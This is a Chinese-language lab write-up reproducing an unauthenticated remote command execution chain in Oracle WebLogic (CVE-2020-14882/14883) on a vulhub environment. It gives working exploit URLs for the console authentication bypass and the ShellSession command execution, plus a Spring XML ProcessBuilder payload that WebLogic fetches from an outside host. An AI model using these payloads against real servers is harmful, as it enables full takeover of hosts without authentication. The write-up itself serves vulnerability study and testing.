Weblogic 未认证远程命令执行(CVE-2020-14882、CVE-2020-14883)
Weblogic 未认证远程命令执行(CVE-2020-14882、CVE-2020-14883)漏洞环境:vulhub漏洞复现:CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证。CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。使用这两个漏洞的连锁,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器
Weblogic 未认证远程命令执行(CVE-2020-14882、CVE-2020-14883)
漏洞环境:
vulhub
漏洞复现:
CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证。CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。使用这两个漏洞的连锁,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机。
1.docker 开个环境:
2.使用payload绕过登录
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
3.第二个漏洞,CVE-2020-14883,有两种利用方式,一种是通过com.tangosol.coherence.mvel2.sh.ShellSession,一种是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext。
第一种
payload:http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/wa1ki0g1');")
成功执行:
注:这种利用方法只能在Weblogic 12.2.1及以上版本中使用,因为10.3.6没有类com.tangosol.coherence.mvel2.sh.ShellSession。
第二种:
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 是一种更常见的漏洞利用,它首先在 CVE-2019-2725 中引入,可用于任何 Weblogic 版本。
要利用FileSystemXmlApplicationContext,您需要制作一个精心制作的 XML 文件并将其提供在 Weblogic 可以访问的服务器上。
xmlpayload:
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[touch /tmp/wa1ki0g2]]></value>
</list>
</constructor-arg>
</bean>
</beans>
然后通过以下 URL,Weblogic 将加载此 XML 并执行其中的命令:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://121.41.55.60/flag.xml”)
利用成功:
更多推荐
所有评论(0)